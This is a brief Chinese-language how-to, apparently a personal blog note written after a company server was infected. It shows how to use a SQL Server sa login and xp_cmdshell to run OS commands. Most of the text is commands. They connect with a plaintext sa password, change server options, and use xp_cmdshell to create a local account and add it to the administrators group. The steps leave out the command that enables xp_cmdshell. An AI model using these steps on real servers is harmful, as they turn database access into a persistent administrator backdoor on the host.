1. 之前看過不少文檔 可以使用 xp_SQLCMD的命令來進行滲透處理, 今天因為公司的服務器又中毒了 自己學習了下.
2. 修改SQLSERVER的設置
遠程登錄數據庫 sqlcmd -S 10.24.160.71 -U sa -P Test6530 修改數據庫配置:
sp_configure 'show advanced options',1
go
reconfigure
go
詳細錯誤如圖示
3. 修改sqlserver的配置 不然會報錯:
修改方法 打開服務 將windows 使用的賬戶 修改為本地賬戶
4. 執行 命令添加用戶
exec xp_cmdshell 'net user cmdshell Test6530 /add'
修改屬主用戶組
exec xp_cmdshell 'net localgroup administrators cmdshell /add'
5. 到具體的操作系統下面驗證相關的操作.
